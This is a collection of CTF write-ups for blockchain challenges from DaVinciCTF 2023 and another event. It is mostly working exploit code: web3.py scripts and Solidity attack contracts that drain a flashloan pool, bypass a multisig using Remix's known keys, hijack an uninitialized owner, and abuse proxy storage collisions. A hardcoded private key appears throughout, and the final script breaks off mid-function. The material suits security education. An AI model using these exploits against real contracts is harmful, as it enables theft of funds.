    function A_delegateccall(bytes memory data) public{
        (bool success,bytes memory returnData)=target.delegatecall(data);
        require(owner==msg.sender);
        flag=true;
    }

It callls by delegatecall so that the storage in the context of target contract is owned by caller.

Solve

import json
from web3 import Web3
from solc import compile_source
w3 = Web3(Web3.HTTPProvider("http://8.218.239.44:8545"))

#Check Connection
t=w3.isConnected()
print(t)

# Get private key 
prikey = '0xa8e07048b0ffaa5daf9ae90e472112398697b1d872ccc4b53e4f8f8bd97d0534'

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address

print(Public_Address) # 0x5471F1Cd844dC1cE3c89e1Ab4468536ee46A9695

myAddr = Public_Address
cont = "0xB76E110cEb5e6F81Ed4b6437506609d11242cAE2" # deployed contract's address

def send_ether(_from, _to, _prikey, amount):
    signed_txn = w3.eth.account.signTransaction(dict(
        nonce=w3.eth.getTransactionCount(_from),
        gasPrice = w3.eth.gasPrice, 
        gas = 1000000,
        to=_to,
        value = amount,
        chainId = w3.eth.chain_id,
        ),
        _prikey
    )
    result = w3.eth.send_raw_transaction(signed_txn.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

send_ether(myAddr, "0xBd3AAb59754ab0735c7F735e51Ebb338E0d2E20d",prikey, 10**15)

def create(code):
    f = open('cont.abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=cont, abi=abi)
    func_call = contract.functions["create"](code).buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

def A_delegateccall(data):
    f = open('cont.abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=cont, abi=abi)
    func_call = contract.functions["A_delegateccall"](data).buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)


def attack_deploy():
    f = open("att.abi", "r"); contract_abi= f.read(); f.close()
    f = open("att.bytecode", "r"); contract_bytecode= f.read(); f.close()

    contract = w3.eth.contract(abi=contract_abi, bytecode=contract_bytecode)
    transaction = contract.constructor(cont).buildTransaction(
        {
            "chainId": w3.eth.chain_id,
            "gasPrice": w3.eth.gas_price,
            "from": Public_Address,
            "nonce": w3.eth.get_transaction_count(Public_Address),
        }
    )
    sign_transaction = w3.eth.account.sign_transaction(transaction, private_key=prikey)
    print("Deploying Contract!")
    # Send the transaction
    transaction_hash = w3.eth.send_raw_transaction(sign_transaction.rawTransaction)
    # Wait for the transaction to be mined, and get the transaction receipt
    print("Waiting for transaction to finish...")
    transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
    print(transaction_receipt)
    print(f"Done! Contract deployed to {transaction_receipt.contractAddress}")
    return str(transaction_receipt.contractAddress)

create(b"\x33\x60\x00\x55")
A_delegateccall(b'\x00')

# flag{0x6625dba6b9f07bfde3ca3423cd4c66bcf68d41e4}

Exist

Analysis

The goal is to call share_my_vault().

It verifies that whether caller is EOA and caller's address should pass is_my_family().

We can easily bypass the logci of is_my_family() by bruteforcing. (requirng 1 second)

Solve

find.py

import json
from web3 import Web3
from solc import compile_source
from Crypto.Util.number import *
from pwn import *
w3 = Web3(Web3.HTTPProvider("http://34.141.16.87:30201/6641d991-702c-43ad-9d84-c3b4f58ad327"))

def check(addr):
    addr = int(addr, 16)
    # addr = long_to_bytes(addr)

    code = 0xffff
    feature = bytes_to_long(b"ZT")

    for i in range(34):
        if addr & code == feature :
            return True
        
        code <<= 4
        feature <<= 4
    
    return False


for i in range(0xffff):
    pk = hex(i).ljust(66, "0")
    addr=w3.eth.account.from_key(pk).address
    if check(addr):
        print(i)

solve.py

import json
from web3 import Web3
from solc import compile_source
w3 = Web3(Web3.HTTPProvider("http://8.218.239.44:8545"))

#Check Connection
t=w3.isConnected()
print(t)

# Get private key 
prikey = hex(289).ljust(66, "0")


# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address

print(Public_Address) # 0x5471F1Cd844dC1cE3c89e1Ab4468536ee46A9695

myAddr = Public_Address
cont = "0x1c7A93d106b832F34BFC734286F1d70381c15479" # deployed contract's address

def send_ether(_from, _to, _prikey, amount):
    signed_txn = w3.eth.account.signTransaction(dict(
        nonce=w3.eth.getTransactionCount(_from),
        gasPrice = w3.eth.gasPrice, 
        gas = 1000000,
        to=_to,
        value = amount,
        chainId = w3.eth.chain_id,
        ),
        _prikey
    )
    result = w3.eth.send_raw_transaction(signed_txn.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

# send_ether(myAddr, "0x3dC10F8Ec58aE18077DF7dfe6Be95e22B4Aefc9b",prikey, 10**15)
# input()

def share_my_vault():
    f = open('cont.abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=cont, abi=abi)
    func_call = contract.functions["share_my_vault"]().buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

def setflag():
    f = open('cont.abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=cont, abi=abi)
    func_call = contract.functions["setflag"]().buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

def attack_deploy():
    f = open("att.abi", "r"); contract_abi= f.read(); f.close()
    f = open("att.bytecode", "r"); contract_bytecode= f.read(); f.close()

    contract = w3.eth.contract(abi=contract_abi, bytecode=contract_bytecode)
    transaction = contract.constructor(cont).buildTransaction(
        {
            "chainId": w3.eth.chain_id,
            "gasPrice": w3.eth.gas_price,
            "from": Public_Address,
            "nonce": w3.eth.get_transaction_count(Public_Address),
        }
    )
    sign_transaction = w3.eth.account.sign_transaction(transaction, private_key=prikey)
    print("Deploying Contract!")
    # Send the transaction
    transaction_hash = w3.eth.send_raw_transaction(sign_transaction.rawTransaction)
    # Wait for the transaction to be mined, and get the transaction receipt
    print("Waiting for transaction to finish...")
    transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
    print(transaction_receipt)
    print(f"Done! Contract deployed to {transaction_receipt.contractAddress}")
    return str(transaction_receipt.contractAddress)

share_my_vault()
setflag()

# flag{0x58c71576485889cc367b4cb238ab719c3c2f7f70}

Hexp

Analysis

3d602d80600a3d3981f362ffffff80600a43034016903a1681146016576033fe5b5060006000f3

abel_0000:
	// Inputs[3]
	// {
	//     @0000  returndata.length
	//     @0006  returndata.length
	//     @0009  memory[returndata.length:returndata.length + 0x2d]
	// }
	0000    3D  RETURNDATASIZE
	0001    60  PUSH1 0x2d
	0003    80  DUP1
	0004    60  PUSH1 0x0a
	0006    3D  RETURNDATASIZE
	0007    39  CODECOPY
	0008    81  DUP2
	0009    F3  *RETURN
	// Stack delta = +1
	// Outputs[3]
	// {
	//     @0000  stack[0] = returndata.length
	//     @0007  memory[returndata.length:returndata.length + 0x2d] = code[0x0a:0x37]
	//     @0009  return memory[returndata.length:returndata.length + 0x2d];
	// }
	// Block terminates

	000A    62    PUSH3 0xffffff
	000E    80    DUP1
	000F    60    PUSH1 0x0a
	0011    43    NUMBER
	0012    03    SUB
	0013    40    BLOCKHASH
	0014    16    AND
	0015    90    SWAP1
	0016    3A    GASPRICE
	0017    16    AND
	0018    81    DUP2
	0019    14    EQ
	001A    60    PUSH1 0x16
	001C    57    *JUMPI
	001D    60    PUSH1 0x33
	001F    FE    *ASSERT
	0020    5B    JUMPDEST
	0021    50    POP
	0022    60    PUSH1 0x00
	0024    60    PUSH1 0x00
	0026    F3    *RETURN

Let's interpret runtime bytecode

assert (blockhash(block.number - 0xa) & 0xffffff == gasprice())

Solve

solve.py

import json
from web3 import Web3
from solc import compile_source
w3 = Web3(Web3.HTTPProvider("http://8.218.239.44:8545"))

#Check Connection
t=w3.isConnected()
print(t)

# Get private key 
prikey = '0xa8e07048b0ffaa5daf9ae90e472112398697b1d872ccc4b53e4f8f8bd97d0534'

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address

print(Public_Address) # 0x5471F1Cd844dC1cE3c89e1Ab4468536ee46A9695

myAddr = Public_Address
cont = "0xB76E110cEb5e6F81Ed4b6437506609d11242cAE2" # deployed contract's address

def send_ether(_from, _to, _prikey, amount):
    signed_txn = w3.eth.account.signTransaction(dict(
        nonce=w3.eth.getTransactionCount(_from),
        gasPrice = w3.eth.gasPrice, 
        gas = 1000000,
        to=_to,
        value = amount,
        chainId = w3.eth.chain_id,
        ),
        _prikey
    )
    result = w3.eth.send_raw_transaction(signed_txn.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)
    print(transaction_receipt['blockHash'])
    return transaction_receipt['blockHash']


from pwn import *


r = remote("8.218.239.44", 24000) # nc 8.218.239.44 24000
r.sendlineafter("t your choice: ", str(1))
r.recvuntil("deployer account: ")
needed_addr = r.recvuntil('\n')[:-1].decode()
r.recvuntil("token: ")
token = r.recvuntil("\n")[:-1].decode()
r.close()
block_num = send_ether(myAddr, needed_addr,prikey, 10**15)

print(needed_addr)
print(token)


r = remote("8.218.239.44", 24000) # nc 8.218.239.44 24000
r.sendlineafter("t your choice: ", str(2))
r.sendlineafter("input your token: ", token)
# get
r.recvuntil("contract address: ")
cont = r.recvuntil("\n")[:-1].decode()
print(cont)
r.close()

from Crypto.Util.number import *
# 현재 블록해시 읽어오기



def create(target):
    f = open('cont.abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=cont, abi=abi)
    func_call = contract.functions["f00000000_bvvvdlt"]().buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": target,
        "gas": target,
        "value": 0,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)
from web3.middleware import geth_poa_middleware

w3.middleware_onion.inject(geth_poa_middleware, layer=0)
cur = w3.eth.get_block('latest')['hash']
print(cur)
target = (bytes_to_long(cur)) & 0xffffff

i = 0
while i < 10:
    try:
        create(target)
    except Exception as e:
        print(e)
        continue
    print("success")
    i += 1

print(token)

# flag{0xdd4672257e7adf56f0896c33747caf793fcd1e53}

LenderPool

Analysis

Its goal is to steal the pool's balance and it provides flashloan of token0.

We can repay by swap() that we can get token1 instead of transfer() that we can not get anything.

Solve

solve.sol

pragma solidity 0.8.16;

contract Attack {
    IERC20 public immutable token0;
    IERC20 public immutable token1;
    LenderPool public immutable lender;
    constructor(address _token0, address _token1, address _lender) {
        token0 = ERC20(_token0);
        token1 = ERC20(_token1);
        lender = LenderPool(_lender);
    }

    function receiveEther(uint256 amount) public {
        lender.swap(address(token1), 100 * 10**18);
    }

    function attack() public {
        token0.approve(address(lender), 100 * 10**18);
        token1.approve(address(lender), 100 * 10**18);
        lender.flashLoan(100 * 10**18, address(this));
        lender.swap(address(token0), 100 * 10**18);
    }
}

solve.py

import json
from web3 import Web3
from solc import compile_source
w3 = Web3(Web3.HTTPProvider("http://8.218.239.44:8545"))

#Check Connection
t=w3.isConnected()
print(t)

# Get private key 
prikey = '0xa8e07048b0ffaa5daf9ae90e472112398697b1d872ccc4b53e4f8f8bd97d0534'

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address

print(Public_Address) # 0x5471F1Cd844dC1cE3c89e1Ab4468536ee46A9695

myAddr = Public_Address
cont = "0xB76E110cEb5e6F81Ed4b6437506609d11242cAE2" # deployed contract's address

def send_ether(_from, _to, _prikey, amount):
    signed_txn = w3.eth.account.signTransaction(dict(
        nonce=w3.eth.getTransactionCount(_from),
        gasPrice = w3.eth.gasPrice, 
        gas = 1000000,
        to=_to,
        value = amount,
        chainId = w3.eth.chain_id,
        ),
        _prikey
    )
    result = w3.eth.send_raw_transaction(signed_txn.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)
    print(transaction_receipt['blockHash'])
    return transaction_receipt['blockHash']


from pwn import *


# r = remote("8.218.239.44", 30000) # nc 8.218.239.44 30000
# r.sendlineafter("t your choice: ", str(1))
# r.recvuntil("deployer account: ")
# needed_addr = r.recvuntil('\n')[:-1].decode()
# r.recvuntil("token: ")
# token = r.recvuntil("\n")[:-1].decode()
# r.close()
# block_num = send_ether(myAddr, needed_addr,prikey, 10**15)

# print(needed_addr)
# print(token)

# sleep(2)

# r = remote("8.218.239.44", 24000) # nc 8.218.239.44 24000
# r.sendlineafter("t your choice: ", str(2))
# r.sendlineafter("input your token: ", token)
# # get
# r.recvuntil("contract address: ")
# cont = r.recvuntil("\n")[:-1].decode()
# print(cont)
# r.close()

from Crypto.Util.number import *
# 현재 블록해시 읽어오기

cont = ""

def attack_deploy():
    f = open("att.abi", "r"); contract_abi= f.read(); f.close()
    f = open("att.bytecode", "r"); contract_bytecode= f.read(); f.close()

    contract = w3.eth.contract(abi=contract_abi, bytecode=contract_bytecode)
    transaction = contract.constructor("0x9510BADedc6B17e570d03BF61889072a5c53B512", "0xCF3E2e53eD9EF06DA74AaAE9d688bba957748209","0x3363E49A69a80d42859f1eb1441953a4b13cF9ad").buildTransaction(
        {
            "chainId": w3.eth.chain_id,
            "gasPrice": w3.eth.gas_price,
            "from": Public_Address,
            "nonce": w3.eth.get_transaction_count(Public_Address),
        }
    )
    sign_transaction = w3.eth.account.sign_transaction(transaction, private_key=prikey)
    print("Deploying Contract!")
    # Send the transaction
    transaction_hash = w3.eth.send_raw_transaction(sign_transaction.rawTransaction)
    # Wait for the transaction to be mined, and get the transaction receipt
    print("Waiting for transaction to finish...")
    transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
    print(transaction_receipt)
    print(f"Done! Contract deployed to {transaction_receipt.contractAddress}")
    return str(transaction_receipt.contractAddress)

def attack(my_attack):
    f = open('att.abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=my_attack, abi=abi)
    func_call = contract.functions["attack"]().buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

attack(attack_deploy())

# print(token) flag{0xf4ea28f40bd256f743544e2c55e00f14701ee20e}

Wallet

Analysis

When the asset owned by this contract is transferred, it requires the confirmation of multi-sig.

        owners.push(address(0x5B38Da6a701c568545dCfcB03FcB875f56beddC4));
        owners.push(address(0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2));
        owners.push(address(0x4B20993Bc481177ec7E8f571ceCaE8A9e22C02db));
        owners.push(address(0x78731D3Ca6b7E34aC0F824c42a7cC18A495cabaB)); 
        owners.push(address(0x617F2E2fD72FD9D5503197092aC168c91465E7f2));

These addresses are used in Remix so that private key is known to the pulbic.

https://github.com/ethereum/remix-project/blob/d13fea7e8429436de6622d855bf75688c664a956/libs/remix-simulator/src/methods/accounts.ts

Solve

solve.sol

contract Attack {
    Wallet public victim;
    constructor(address _victim) {
        victim = Wallet(_victim);
    }

    function attack() public {
        bytes memory reason = new bytes(1);
        bytes32[2] memory rs;
        bytes32 tmp;
        assembly { 
            mstore(add(tmp, 32), 0x2c890c0d647e541dfb6701d777e40612030681c9f87777cc2866443d87994c9d) 
        }
        rs[0] = tmp;
        assembly { 
            mstore(add(tmp, 32), 0xf2149f718256ba41c5be7e037786ae06d371064fdf80cb333ff46bcef1ea0e3c) 
        } 
        rs[1] = tmp;
        reason[0] = 0;
        SignedByowner[] memory ss = new SignedByowner[](3);
        ss[0] = SignedByowner(Holder(address(0x5B38Da6a701c568545dCfcB03FcB875f56beddC4), "1", true, reason), Signature(28, rs));
        ss[1] = SignedByowner(Holder(address(0x5B38Da6a701c568545dCfcB03FcB875f56beddC4), "1", true, reason), Signature(28, rs));
        ss[2] = SignedByowner(Holder(address(0x5B38Da6a701c568545dCfcB03FcB875f56beddC4), "1", true, reason), Signature(28, rs));

        victim.transferWithSign(address(0x7Eeca3D06bfc20A1d0CbA259918BF6031DD5778B), 100 * 10 ** 18, ss);
    }
}

solve.py

import json
from web3 import Web3
from solc import compile_source
w3 = Web3(Web3.HTTPProvider("http://8.218.239.44:8545"))

#Check Connection
t=w3.isConnected()
print(t)

# Get private key 
prikey = '0xa8e07048b0ffaa5daf9ae90e472112398697b1d872ccc4b53e4f8f8bd97d0534'

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address

print(Public_Address) # 0x5471F1Cd844dC1cE3c89e1Ab4468536ee46A9695

myAddr = Public_Address
cont = "0x1fa9554d439ed54BDfC50b227B62c60E864CE0B0" # deployed contract's address

def send_ether(_from, _to, _prikey, amount):
    signed_txn = w3.eth.account.signTransaction(dict(
        nonce=w3.eth.getTransactionCount(_from),
        gasPrice = w3.eth.gasPrice, 
        gas = 1000000,
        to=_to,
        value = amount,
        chainId = w3.eth.chain_id,
        ),
        _prikey
    )
    result = w3.eth.send_raw_transaction(signed_txn.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

# send_ether(myAddr, "0xBd3AAb59754ab0735c7F735e51Ebb338E0d2E20d",prikey, 10**15)

def attack(addr):
    f = open('att.abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=addr, abi=abi)
    func_call = contract.functions["attack"]().buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)



def attack_deploy():
    f = open("att.abi", "r"); contract_abi= f.read(); f.close()
    f = open("att.bytecode", "r"); contract_bytecode= f.read(); f.close()

    contract = w3.eth.contract(abi=contract_abi, bytecode=contract_bytecode)
    transaction = contract.constructor(cont).buildTransaction(
        {
            "chainId": w3.eth.chain_id,
            "gasPrice": w3.eth.gas_price,
            "from": Public_Address,
            "nonce": w3.eth.get_transaction_count(Public_Address),
        }
    )
    sign_transaction = w3.eth.account.sign_transaction(transaction, private_key=prikey)
    print("Deploying Contract!")
    # Send the transaction
    transaction_hash = w3.eth.send_raw_transaction(sign_transaction.rawTransaction)
    # Wait for the transaction to be mined, and get the transaction receipt
    print("Waiting for transaction to finish...")
    transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
    print(transaction_receipt)
    print(f"Done! Contract deployed to {transaction_receipt.contractAddress}")
    return str(transaction_receipt.contractAddress)

attack(attack_deploy())

# flag{0x4c7d8e17af758ca5204f61c16ea4353387352aeb}

Move to Checkin

Analysis

We should just call function HelloHackers() in module checkin.

Solve

# to copy my address for faucet
sui client active-address

# connect RPC
sui client new-env --alias ctf --rpc http://159.138.63.196:9000

# switch network
sui client switch --env ctf

# list sui received by faucet
sui client object 

# transfer sui to deployer
sui client transfer-sui --to 0xa70e7a452178b6c32797728d3a97f9a87a0aac6c --sui-coin-object-id 0x66a9fdf22caae3d28352b9d91e896d7f24c36392 --gas-budget 10000

# call entry function 
sui client call --function HelloHackers --module checkin --package 0xbc6777abb944886981241a70fdc46425e428c9cc --args "hello" --gas-budget 100000

DaVinciCTF 2023 - blockchain

gss1 — Mon, 13 Mar 2023 08:15:34 +0900

https://ctftime.org/event/1858

Owner powned

chall

// SPDX-License-Identifier: MIT
pragma solidity ^0.7.6;
 
 

contract Challenge1 {

    address public me;
    mapping(address => uint256) balances;

//constructor
    function initWallet() public {
        me = msg.sender;
    }

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }
    
    function withdraw(uint256 amount) public {
        require(amount <= balances[msg.sender]);
        payable(msg.sender).transfer(amount);
        balances[msg.sender] -= amount;
    }
//If there is an emergency, i'm protected \o/
    function migrateTo(address to) public {
        require(msg.sender == me, "Only me can withdraw all the funds");
        payable(to).transfer(address(this).balance);
    }
//getBalance returns the balance of the contract, it is always nice to check my fortune 
    function getBalance() public view returns (uint) 
    {
        return (address(this).balance / 1 ether);
    }

}

solve

import json
from web3 import Web3
from solc import compile_source
w3 = Web3(Web3.HTTPProvider("http://z.dvc.tf:7545"))

#Check Connection
t=w3.isConnected()
print(t)

# Get private key 
prikey =  '0xa8e07048b0ffaa5daf9ae90e472112398697b1d872ccc4b53e4f8f8bd97d0534'

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address

print(Public_Address) # 0x1A422f86D5381E84b01907ddF0E53fa9A6B2a3B3

myAddr = Public_Address
me = "0x284cC70A18899D6abc7AE968900D252812a961c6"
cont = "0x702F454A55322E08ACB0292c066a4bBa7EEa9bD5" # deployed contract's address


def initWallet():
    f = open('con_abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=cont, abi=abi)
    func_call = contract.functions["initWallet"]().buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

def migrateTo():
    f = open('con_abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=cont, abi=abi)
    func_call = contract.functions["migrateTo"](myAddr).buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

initWallet()
migrateTo()

Upgradeable Casino

chall

casino.sol

// SPDX-License-Identifier: MIT

pragma solidity ^0.7.6;

contract Casino {
    uint256 maxFreeTokens = 10;

    // Keep track of the tokens spent at each game
    uint64 roulette = 0;
    uint64 slotMachine = 0;
    uint64 blackjack = 0;
    uint64 poker = 0;

    address admin = 0x5aB8C62A01b00f57f6C35c58fFe7B64777749159;
    mapping(address => uint256) balances;
    mapping(address => uint256) lastFreeTokenRequest;


    function changeMaxFreeTokens(uint256 newValue) external
    {
        require(msg.sender == admin, "Only admin can change the number of free tokens you can get");
        maxFreeTokens = newValue;
    }

    function requestFreeTokens(uint256 numberOfTokensRequested) external {
        require(numberOfTokensRequested <= maxFreeTokens, "You can't request that much free tokens");

        require(block.number > lastFreeTokenRequest[msg.sender] + 2,
        "Wait a few more blocks before collecting free tokens");

        lastFreeTokenRequest[msg.sender] = block.number;

        balances[msg.sender] += numberOfTokensRequested;
    }

    function playTokens(uint64 tokensForRoulette, uint64 tokensForSlotMachine, uint64 tokensForBlackjack, uint64 tokensForPoker) external
    {
        require(tokensForRoulette + tokensForSlotMachine + tokensForBlackjack + tokensForPoker <= balances[msg.sender],
        "You don't have enough tokens to play");

        // Increase the analytics variables
        roulette += tokensForRoulette;
        slotMachine += tokensForSlotMachine;
        blackjack += tokensForBlackjack;
        poker += tokensForPoker;

        balances[msg.sender] -= tokensForRoulette + tokensForSlotMachine + tokensForBlackjack + tokensForPoker;

        uint256 earnedTokens = 0;

        // Play the tokens at the chosen games

        // Roulette
        earnedTokens += tokensForRoulette*2*(randMod(3) == 0 ? 1 : 0);
        
        // Slot
        earnedTokens += tokensForSlotMachine * 500 * (randMod(1000) == 0 ? 1 : 0);

        // Blackjack
        earnedTokens += tokensForBlackjack * 15 * (randMod(21) == 0 ? 1 : 0);

        // Poker
        earnedTokens += tokensForPoker * 10000 * (randMod(15000) == 0 ? 1 : 0);

        balances[msg.sender] += earnedTokens;
    }

    // Initializing the state variable
    uint randNonce = 0;
 
    // Defining a function to generate
    // a random number
    function randMod(uint _modulus) internal returns(uint)
    {
        // increase nonce
        randNonce++;
        return uint(keccak256(abi.encodePacked(block.timestamp,msg.sender,randNonce))) % _modulus;
    }

    function getBalance(address user) external view returns(uint256){
        return balances[user];
    }

    function buyTokens() payable external {
        // deposit sizes are restricted to 1 ether
        require(msg.value == 1 ether);

        balances[msg.sender] += 10000 ;
    }

}

proxy.sol

// SPDX-License-Identifier: MIT

pragma solidity ^0.7.6;


contract Proxy {
    address _implementation;
    address _owner = 0x5aB8C62A01b00f57f6C35c58fFe7B64777749159; //0x0000000000000000000000000000000000000000;

    /**
     * @dev Initializes the upgradeable proxy with an initial implementation specified by `_logic`.
     *
     * If `_data` is nonempty, it's used as data in a delegate call to `_logic`. This will typically be an encoded
     * function call, and allows initializing the storage of the proxy like a Solidity constructor.
     */
    constructor(address _logic) payable {
        _implementation = _logic;
    }

    function getOwner() external view returns (address) {
        return _owner;
    }

    /**
     * @dev Delegates the current call to `implementation`.
     *
     * This function does not return to its internal call site, it will return directly to the external caller.
     */
    function _delegate(address implementation) internal virtual {
        assembly {
            // Copy msg.data. We take full control of memory in this inline assembly
            // block because it will not return to Solidity code. We overwrite the
            // Solidity scratch pad at memory position 0.
            calldatacopy(0, 0, calldatasize())

            // Call the implementation.
            // out and outsize are 0 because we don't know the size yet.
            let result := delegatecall(gas(), implementation, 0, calldatasize(), 0, 0)

            // Copy the returned data.
            returndatacopy(0, 0, returndatasize())

            switch result
            // delegatecall returns 0 on error.
            case 0 {
                revert(0, returndatasize())
            }
            default {
                return(0, returndatasize())
            }
        }
    }

    /**
     * @dev Delegates the current call to the address returned by `_implementation()`.
     *
     * This function does not return to its internal call site, it will return directly to the external caller.
     */
    function _fallback() internal virtual {
        _delegate(_implementation);
    }

    /**
     * @dev Fallback function that delegates calls to the address returned by `_implementation()`. Will run if no other
     * function in the contract matches the call data.
     */
    fallback() external payable virtual {
        _fallback();
    }

    /**
     * @dev Fallback function that delegates calls to the address returned by `_implementation()`. Will run if call data
     * is empty.
     */
    receive() external payable virtual {
        _fallback();
    }


    /**
     * @dev Stores a new address in the EIP1967 implementation slot.
     */
    function _setImplementation(address newImplementation) private {
        _implementation = newImplementation;
    }

    /**
     * @dev Perform implementation upgrade
     *
     * Emits an {Upgraded} event.
     */
    function _upgradeTo(address newImplementation) internal {
        _setImplementation(newImplementation);
    }


    /**
     * @dev Upgrade the implementation of the proxy to `newImplementation`.
     *
     * Calls {_authorizeUpgrade}.
     *
     * Emits an {Upgraded} event.
     */
    function upgradeTo(address newImplementation) external {
        require(_owner == msg.sender, "Ownable: caller is not the owner");
        _implementation = newImplementation;
    }
}

solve

There are conflicts of storage slot.

proxy's implementation = maxFreeTokens

proxy's owner = poker || blackjack || slotMachine || roulette

from web3 import Web3
import sha3
import json
from solc import compile_source
import time
w3 = Web3(Web3.HTTPProvider("http://z.dvc.tf:7545"))
#Check Connection
t=w3.isConnected()
print(t)

# Get private key 
prikey =  '0xa8e07048b0ffaa5daf9ae90e472112398697b1d872ccc4b53e4f8f8bd97d0534'

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address

print(Public_Address) # 0x1A422f86D5381E84b01907ddF0E53fa9A6B2a3B3

myAddr = Public_Address
cont = "0xc2eD7BC05DB0d4FfF20F41D1cFf09CD7C7cC8EB8" # proxy contract address

from Crypto.Util.number import *
def getRand(time, addr, nonce):
    return bytes_to_long(Web3.soliditySha3(['uint256', 'address','uint256'], [time, addr, nonce]))

def getTime():
    return w3.eth.get_block('latest')['timestamp']



target1 = 0xD1fF9D506104c5Bd6688Ca5DFd3068170025eD36 
target2 = 0x5aB8C62A01b00f57f6C35c58fFe7B64777749159


targets = []
divs = [2, 500, 15, 10000]

for i in range(4):
    targets.append(((target1 >> 64 * (3-i)) & 0xffffffffffffffff) - ((target2 >> 64 * (3-i)) & 0xffffffffffffffff))

for i in range(4):
    print(targets[i])
answers = [0] * 4


results = []


def playTokens(a, b, c, d):
    f = open('con_abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=cont, abi=abi)
    func_call = contract.functions["playTokens"](a, b, c, d).buildTransaction({
